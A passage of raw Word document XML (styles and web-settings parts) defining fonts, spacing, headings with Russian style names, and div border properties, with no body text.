    <w:rsid w:val="00F455FD"/>
    <w:rsid w:val="00F57840"/>
    <w:rsid w:val="00F6140E"/>
    <w:rsid w:val="00FA70D2"/>
    <w:rsid w:val="00FB3A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33389"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8828A5D0-B49F-4A28-B6FE-F1421105F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7525"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="851"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003A6F8A"/>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003A6F8A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="240"/>
      <w:ind w:firstLine="426"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
      <w:b/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="30"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00D91A39"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>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4014A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914F9E"/>
    <w:pPr>
      <w:spacing w:before="360" w:after="360"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a4">
    <w:name w:val="Заголовок Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="a0"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="00914F9E"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="28"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003A6F8A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="28"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00A30BD5"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A30BD5"/>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A30BD5"/>
    <w:pPr>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rsid w:val="00A30BD5"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A30BD5"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003E4F7A"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a8">
    <w:name w:val="Текст выноски Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="003E4F7A"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="003A6F8A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="26"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="aa"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005C07FB"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aa">
    <w:name w:val="Верхний колонтитул Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005C07FB"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005C07FB"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ac">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="ab"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005C07FB"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ad">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C14C68"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ae">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="003E7C76"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009369F2"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af0">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="af1"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rsid w:val="00235283"/>
    <w:pPr>
      <w:spacing w:before="240"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af1">
    <w:name w:val="Подзаголовок Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="af0"/>
    <w:uiPriority w:val="11"/>
    <w:rsid w:val="00235283"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af2">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00953F2E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D91A39"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002B5C0C"/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af3">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00731752"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="Заголовок 4 Знак"/>
    <w:basedOn w:val="a1"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="004014A6"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="B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56671">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="95250186">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="167067388">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="249705220">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="326517236">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="326519821">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="367416987">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="415447365">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="441994177">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="462650116">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="473714631">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="588388129">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="637299148">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="643044465">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="764768474">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="772634548">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1715546098">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1463572500">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1748380121">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="829054080">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="855579496">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="917011596">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="987514797">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="278072870">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1004823552">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1294992054">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="987713519">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1064568941">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1075779744">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1091270827">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1145513032">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1206596744">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
